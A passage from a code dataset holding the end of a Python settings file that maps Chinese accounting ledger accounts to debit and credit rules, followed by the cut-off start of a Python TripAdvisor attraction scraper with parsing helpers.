{\"opposite\":[\"递延所得税资产\",\"递延所得税负债\"],\"event\":\"确认递延所得税费用\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": [\"应交税费\"], \"event\": \"冲减多计提所得税\", \"problem\": None},\n {\"opposite\": [\"银行存款\"], \"event\": \"收到所得税退款\", \"problem\": None},\n {\"opposite\": [\"递延所得税资产\", \"递延所得税负债\"], \"event\": \"冲减递延所得税费用\", \"problem\": None},\n ]},\n{\"no\":23,\"subject\":\"递延所得税资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"递延所得税资产增加\",\"problem\":\"递延所得税资产增加\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"递延所得税资产减少\",\"problem\":\"递延所得税资产减少\"},\n ]},\n{\"no\":23,\"subject\":\"递延所得税负债\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"递延所得税负减少\",\"problem\":\"递延所得税负减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"递延所得税负债增加\",\"problem\":\"递延所得税负债增加\"},\n ]},\n{\"no\":24,\"subject\":\"资产处置收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"资产处置损失\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"资产处置收益\",\"problem\":None},\n ]},\n{\"no\":25,\"subject\":\"营业外收入\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"冲减营业外收入\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"营业外收入-收到货币资金\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"营业外收入-未收到货币资金\",\"problem\":None},\n ]},\n\n{\"no\":26,\"subject\":\"营业外支出\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"营业外支出-支付货币资金\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"营业外支出-非支付货币资金\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减营业外支出\",\"problem\":None},\n ]},\n{\"no\":27,\"subject\":\"短期借款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"偿还短期借款\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"取得短期借款\",\"problem\":None},\n ]},\n{\"no\":27,\"subject\":\"长期借款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"偿还长期借款\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"取得长期借款\",\"problem\":None},\n ]},\n{\"no\":28,\"subject\":\"应付股利\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"支付应付股利\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提应付股利\",\"problem\":None},\n ]},\n{\"no\":29,\"subject\":\"盈余公积\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"股本\", \"资本公积\"], \"event\": \"盈余公积转增资本\", \"problem\": None},\n {\"opposite\": [\"利润分配\"], \"event\": \"盈余公积弥补亏损\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"提取盈余公积\",\"problem\":None},\n ]},\n{\"no\":30,\"subject\":\"一般风险准备\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"利润分配\"], \"event\": \"一般风险准备弥补亏损\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"提取一般风险准备\",\"problem\":None},\n ]},\n{\"no\":31,\"subject\":\"专项储备\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"冲减专项储备\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"提取专项储备\",\"problem\":None},\n ]},\n{\"no\":32,\"subject\":\"利润分配\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"使用货币资金进行利润分配\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"股本\",\"资本公积\"],\"event\":\"未分配利润转增股本\",\"problem\":None},\n ]},\n{\"no\":33,\"subject\":\"股本\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"股本减少\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"收到股东投资款-货币出资\",\"problem\":None},\n {\"opposite\":[\"原材料\",\"库存商品\",\"产成品\",\"低值易耗品\",\"固定资产\",\"应交税费\"],\"event\":\"收到股东投资款-非货币出资\",\"problem\":None},\n {\"opposite\":[\"资本公积\"],\"event\":\"资本公积转增股本\",\"problem\":None},\n ]},\n{\"no\":34,\"subject\":\"资本公积\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"资本公积减少\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"资本公积增加\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"应收股利\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"确认应收股利\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"收回应收股利\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"发出商品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"原材料\",\"库存商品\",\"产成品\"] , \"event\": \"结转发出商品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"发出商品结转至成本\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"自制半成品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"生产成本\"] , \"event\": \"自制半成品入库\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"生产成本\"],\"event\":\"领用自制半成品用于生产\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"原材料\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入原材料\", \"problem\": None},\n {\"opposite\":[\"其他应付款\"] , \"event\": \"购入原材料-贷方为其他应付款\", \"problem\": \"购入原材料-贷方为其他应付款\"},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转原材料\", \"problem\": None},\n {\"opposite\":[\"委托加工物资\",\"应付账款\",\"物资采购\",\"材料采购\"] , \"event\": \"委托加工物资结转原材料\", \"problem\": None},\n {\"opposite\":[\"生产成本\"] , \"event\": \"自制原材料\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售原材料结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用原材料用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用原材料用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领料用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领料用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领料用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领料用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用原材料\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"材料采购\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\"] , \"event\": \"材料采购转入应付账款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"材料采购增加\",\"problem\":\"材料采购增加\"},\n ]},\n{\"no\":35,\"subject\":\"物资采购\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\"] , \"event\": \"物资采购转入应付账款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"物资采购增加\",\"problem\":\"物资采购增加\"},\n ]},\n{\"no\":35,\"subject\":\"低值易耗品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入低值易耗品\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转低值易耗品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售低值易耗品结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用值易耗品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用低值易耗品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领低值易耗品用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领低值易耗品用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领低值易耗品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领低值易耗品用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用低值易耗品\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"周转材料\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入周转材料\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转周转材料\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售周转材料结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用值易耗品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用周转材料用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领��转材料用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领周转材料用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领周转材料用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领周转材料用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用周转材料\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"包装物\",\"debit_only_one\":False,\n\"debit\":[\n{\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入包装物\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转包装物\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售包装物结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用包装物用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用包装物用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领包装物用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领包装物用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领包装物用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领包装物用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用包装物\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"包装物及低值易耗品\",\"debit_only_one\":False,\n\"debit\":[\n{\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入包装物及低值易耗品\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转包装物及低值易耗品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售包装物及低值易耗品结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用包装物及低值易耗品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用包装物及低值易耗品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领包装物及低值易耗品用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领包装物及低值易耗品用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领包装物及低值易耗品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领包装物及低值易耗品用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用包装物及低值易耗品\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"库存商品\",\"debit_only_one\":False,\n\"debit\":[\n{\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入库存商品\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转库存商品\", \"problem\": None},\n {\"opposite\":[\"委托加工物资\",\"应付账款\",\"预付账款\",\"其他应收款\",\"其他应付款\"] , \"event\": \"委托加工物资结转库存商品\", \"problem\": None},\n {\"opposite\":[\"生产成本\"] , \"event\": \"自制库存商品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售库存商品结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用库存商品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用库存商品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领用库存商品用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领用库存商品用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领用库存商品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领用库存商品用于委外加工\",\"problem\":None},\n {\"opposite\": [\"主营业务成本\", \"其他业务成本\", \"管理费用\", \"销售费用\", \"研发费用\",\n \"制造费用\", \"生产成本\", \"在建工程\", \"委托加工物资\", \"开发支出\",\"营业外支出\"], \"event\": \"领用库存商品\", \"problem\": None},\n ]},\n{\"no\":35,\"subject\":\"产成品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"生产成本\"] , \"event\": \"生产产成品入库\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"产成品销售结转成本\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领用产成品于在建工程\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用产成品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用产成品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领用产成品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领用产成品用于委外加工\",\"problem\":None},\n {\"opposite\": [\"主营业务成本\", \"其他业务成本\", \"管理费用\", \"销售费用\", \"研发费用\",\n \"制造费用\", \"生产成本\", \"在建工程\", \"委托加工物资\", \"开发支出\",\"营业外支出\"], \"event\": \"领用产成品\", \"problem\": None},\n ]},\n{\"no\":35,\"subject\":\"委托加工物资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"应付账款\", \"预付款项\", \"应付票据\", \"其他应收款\", \"其他应付款\", \"库存现金\", \"银行存款\"], \"event\": \"付现委外加工费用\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"委托加工物资减少\",\"problem\":\"委托加工物资减少\",},\n ]},\n{\"no\":35,\"subject\":\"生产成本\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"其他应付款\",\"库存现金\",\"银行存款\"] , \"event\": \"付现生产成本\", \"problem\": None},\n {\"opposite\":[\"制造费用\"] , \"event\": \"制造费用结转生产成本\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": \"all\", \"event\": \"生产成本减少\", \"problem\": \"生产成本减少\", },\n ]},\n{\"no\":35,\"subject\":\"制造费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"库存现金\",\"银行存款\",\"应付账款\",\"预付款项\",\"其他应收款\",\"其他应付款\",\"应付票据\"] , \"event\": \"付现制造费用\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": \"all\", \"event\": \"制造费用减少\", \"problem\": \"制造费用减少\", },\n ]},\n{\"no\":35,\"subject\":\"在建工程\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"在建工程增加\", \"problem\": \"在建工程增加\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"应交税费\"],\"event\":\"在建工程进项税冲减在建工程原值\",\"problem\":\"在建工程进项税冲减在建工程原值\"},\n {\"opposite\":\"all\",\"event\":\"在建工程减少\",\"problem\":\"在建工程减少\"},\n ]},\n{\"no\":35,\"subject\":\"工程物资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"应付账款\",\"其他应付款\",\"长期应付款\",\"库存现金\",\"银行存款\"], \"event\": \"购买工程物资\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"工程物资减少\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"销售费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"费用增加-销售费用增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减销售费用\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"管理费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"费用增加-管理费用增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减管理费用\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"研发费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"费用增加-研发费用增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减研发费用\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"应交税费\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付应交税费\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"应交税费增加\",\"problem\":\"应交税费增加\"},\n ],\n \"two_way\":[\n {\"keywords\": [\"未交增值税\"], \"contain_event\": \"未交增值税结转\", \"problem\": None},\n ]\n },\n{\"no\":36,\"subject\":\"应付账款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付应付账款\", \"problem\": None},\n {\"opposite\": [\"预付款项\"], \"event\": \"应付账款与预付账款对冲\", \"problem\": None},\n {\"opposite\": [\"其他应付款\"], \"event\": \"应付账款转入其他应付款\", \"problem\": None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"应付账款与其他应收款对冲\", \"problem\": None},\n {\"opposite\": [\"应付票据\"], \"event\": \"应付账款转入应付票据\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"应付账款增加\",\"problem\":\"应付账款增加\"},\n ]},\n{\"no\":36,\"subject\":\"预付款项\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付预付款\", \"problem\": None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"预付账款转入其他应收款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"预付账款减少\",\"problem\":\"预付账款减少\"},\n ]},\n{\"no\":36,\"subject\":\"应付票据\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付应付票据\", \"problem\": None},\n {\"opposite\": [\"预付款项\"], \"event\": \"应付票据与预付账款对冲\", \"problem\": None},\n {\"opposite\": [\"其他应付款\"], \"event\": \"应付票据转入其他应付款\", \"problem\": None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"应付票据与其他应收款对冲\", \"problem\": None},\n {\"opposite\": [\"应付账款\"], \"event\": \"应付票据转入应付账款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"应付票据增加\",\"problem\":\"应付票据增加\"},\n ]},\n\n{\"no\":36,\"subject\":\"预付款项\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付预付款\", \"problem\": None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"预付账款转入其他应收款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"预付账款减少\",\"problem\":\"预付账款减少\"},\n ]},\n{\"no\":18,\"subject\":\"其他应收款\",\"debit_only_one\":False,\n\"debit\":\n [\n {\"keywords\": [\"押金\",\"保证金\",\"质保金\",\"履约金\"],\"contain_event\":\"支付押金及保证金\",\"problem\": None},\n {\"keywords\": [\"罚款\",\"赔款\",\"保险赔款\"],\"contain_event\":\"支付罚款及赔款\",\"problem\": None},\n {\"keywords\": [\"备用金\",\"员工借款\"],\"contain_event\":\"支付员工备用金\",\"problem\": None},\n {\"keywords\": [\"代缴\",\"代垫\",\"代付\",\"水电费\",\"医药费\",\"房租费\",\"社保\",\"公积金\",\n \"养老保险\",\"医疗保险\",\"失业保险\",\"工伤保险\",\"生育保险\",\"社会保险\"],\"contain_event\":\"代缴代付款\",\"problem\": None},\n {\"keywords\": [\"公司\",\"厂\",\"往来款\",\"集团内部\",\"内部往来\"],\"contain_event\":\"公司往来款\",\"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"收回其他应收款\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"其他应收款减少\",\"problem\":\"其他应收款减少\"},\n ]\n },\n{\"no\":18,\"subject\":\"其他应付款\",\"debit_only_one\":False,\n\"debit\":\n [\n {\"opposite\": monetary_funds, \"event\": \"支付其他应付款\", \"problem\": None},\n {\"opposite\": \"all\", \"event\": \"其他应付款减少\", \"problem\": \"其他应付款减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"keywords\": [\"押金\", \"保证金\",\"质保金\",\"履约金\"], \"contain_event\": \"收到押金及保证金\", \"problem\": None},\n {\"keywords\": [\"罚款\", \"赔款\", \"保险赔款\"], \"contain_event\": \"收到罚款及赔款\", \"problem\": None},\n {\"keywords\": [ \"代收\", \"水电费\", \"医药费\", \"房租费\", \"社保\", \"公积金\",\n \"养老保险\", \"医疗保险\", \"失业保险\", \"工伤保险\", \"生育保险\", \"社会保险\"], \"contain_event\": \"暂收代付款\", \"problem\": None},\n {\"keywords\": [\"公司\", \"厂\", \"往来款\",\"集团内部\",\"内部往来\"], \"contain_event\": \"公司往来款\", \"problem\": None},\n ]\n },\n{\"no\":36,\"subject\":\"库存现金\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"银行存款\"], \"event\": \"银行提取现金\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"银行存款\"],\"event\":\"现金存银行\",\"problem\":None},\n ]},\n{\"no\":36,\"subject\":\"银行存款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"银行存款增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"银行存款减少\",\"problem\":None},\n ]},\n]\n","sub_path":"settings/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":68017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"462514598","text":"import json\nimport re\nfrom typing import Any, Optional\nfrom urllib.parse import parse_qs, urlparse, ParseResult\n\nfrom shapely.geometry import Point\n\nfrom tripadvisor.browser import Response\n\nURL = 'https://www.tripadvisor.com'\n\n\ndef find_value_nested_dict(key: Any, dct: dict) -> Optional[Any]:\n val1 = dct.get(key, None)\n if val1:\n return val1\n else:\n for k in dct.keys():\n if isinstance(dct[k], dict) and key in dct[k]:\n return dct[k][key]\n return None\n\n\ndef extract_integer(line: str) -> int:\n \"\"\"Extract alle cijfers uit een string.\"\"\"\n if isinstance(line, int):\n return line\n try:\n return int(re.sub(r'[^0-9]', '', line))\n except (TypeError, ValueError, AttributeError):\n return -1\n\n\ndef extract_float(line) -> float:\n if isinstance(line, float):\n return line\n\n elif isinstance(line, int):\n return float(line)\n\n else:\n try:\n return float(re.sub(r'[^0-9.]', '', line.replace(',', '.')))\n except (TypeError, ValueError, AttributeError):\n return -1.0\n\n\ndef extract_phonenr(line: str) -> str:\n \"\"\"Extract telefoonnummer uit string.\"\"\"\n return re.sub(r'[^+0-9]', '', line)\n\n\nclass Attractie:\n _response: Response\n\n _xpath_staticmap_element: str = \"//img[contains(@src, 'maps.google')]\"\n _tripadvisor_id: int\n _title: str\n _straat: str\n _postcode: str\n _plaats: str\n _country: str\n _coords: Point\n _rating: float\n _aantal_reviews: int\n _reviews: list\n _link: ParseResult\n\n def __init__(self, link: str, headless: bool = True):\n self.link = link\n self.get_attractie(headless=headless)\n\n def __repr__(self):\n return f\"Titel: {self.title}\\n\" \\\n f\"ID: {self.tripadvisor_id}\\n\" \\\n f\"Rating: {self.rating}\\n\" \\\n f\"Aantal reviews: {self.aantal_reviews}\\n\" \\\n f\"Reviews: {self.reviews}\\n\" \\\n f\"Straat: {self.straat}\\n\" \\\n f\"Land: {self.country}\\n\" \\\n f\"Postcode: {self.postcode}\\n\" \\\n f\"Coordinaten: {self.coords}\"\n\n @property\n def link(self) -> ParseResult:\n return self._link\n\n @link.setter\n def link(self, value: str):\n try:\n link = urlparse(f\"{URL}{value}\")\n\n except (AttributeError, TypeError, ValueError):\n print(f'geen geldige url: {value}')\n self._link = urlparse('')\n\n else:\n self._link = link\n\n @property\n def response(self):\n return self._response\n\n @property\n def title(self) -> str:\n return self._title\n\n @title.setter\n def title(self, value: str):\n self._title = str(value).strip() if value else ''\n\n @property\n def tripadvisor_id(self) -> int:\n return self._tripadvisor_id\n\n @tripadvisor_id.setter\n def tripadvisor_id(self, value: str):\n self._tripadvisor_id = extract_integer(value)\n\n @property\n def rating(self) -> float:\n return self._rating\n\n @rating.setter\n def rating(self, value: str):\n self._rating = extract_float(value)\n\n @property\n def plaats(self) -> str:\n return self._plaats\n\n @plaats.setter\n def plaats(self, value: str):\n self._plaats = value if value else ''\n\n @property\n def straat(self) -> str:\n return self._straat\n\n @straat.setter\n def straat(self, value: str):\n self._straat = value if value else ''\n\n @property\n def postcode(self) -> str:\n return self._postcode\n\n @postcode.setter\n def 